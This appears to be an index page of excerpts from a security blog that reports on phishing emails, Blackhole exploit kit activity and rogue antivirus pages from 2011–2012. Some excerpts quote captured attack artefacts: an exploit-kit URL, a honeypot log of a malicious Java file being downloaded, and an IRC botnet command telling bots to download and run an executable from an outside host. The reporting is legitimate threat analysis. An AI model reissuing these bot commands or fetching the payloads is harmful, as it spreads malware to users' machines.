Posted by admin on Sunday, September 16th, 2012 | 11,955 views
When we analyzed a few Twitter followers in one of our websites, we noted that there was a user that was following us, see the image: We have analyzed the website (infected): www (dot) wordpress-how-to-videos (dot) com. The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220....
Posted by admin on Saturday, June 9th, 2012 | 60,538 views
We received a few emails with the subject: Amazon.com Order Confirmation. Inside the email message there is an HREF link that redirects users to a malicious web page containing malicious JavaScript code used to redirect users to the main URL of the Blackhole exploit kit: The Blackhole exploit kit URL is: GET /main.php?page=017f3bb5c2be6a41 ...
Posted by admin on Thursday, June 7th, 2012 | 7,454 views
Our honeypot has logged some new Blackhole Exploit Kit activity. The Java exploit file Set.jar is downloaded: GET /Set.jar HTTP/1.1 content-type: application/x-java-archive User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13 Host: 64.111.24.122 HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Jun 2012 22:43:12 GMT Content-Type: app...
Posted by admin on Thursday, May 17th, 2012 | 6,661 views
Users have reported another malicious email message with the subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to the Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message: Email [...]
Posted by admin on Friday, May 4th, 2012 | 11,311 views
We have logged a new email that looks like it was sent by LinkedIn: The email header info shows it is a scam: Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24]) Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net Date: Fri, 04 May 2...
Posted by admin on Friday, March 30th, 2012 | 2,576 views
We have received a few emails that looked like they were sent from LinkedIn: But after checking the email header details it was clearly spam: Return-Path: trtro@www.trt.ro Received: from vps136.whmpanels.com (unknown [89.42.219.181]) Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com Date: Fri, 30 Mar 2012 21:37:47 +...
Posted by admin on Saturday, January 28th, 2012 | 5,353 views
We have received various spam emails that simulate messages from the Better Business Bureau (BBB), but in reality are used to spread malicious links that lead to the Blackhole Exploit Kit. The subject of the emails looks like this: Your updated information is necessary A screenshot of the email: Other details of the emails: Return-Path: &...
Posted by admin on Thursday, April 14th, 2011 | 5,187 views
We have detected a few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software. First initial fake alert: Fake scanner page in action: Prompt to download the (infected) setup file of the rogue software: Report date: 2011-04-15 01:10:23 (GMT 1) File name: bestav2-exe Fi...
Posted by admin on Monday, March 28th, 2011 | 6,839 views
We noticed the following details in a log file in our sandbox: :m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr :Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/ :Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177 These d...
Posted by admin on Tuesday, March 22nd, 2011 | 5,904 views
Windows Emergency System (similar to Windows Emergency System) is another rogue security software that claims to scan the system to find errors; instead it shows fake errors, stating that it is necessary to buy the full version of the software to fix the non-existent errors. Fake security alerts: Fake scanner page: Other fake security ale...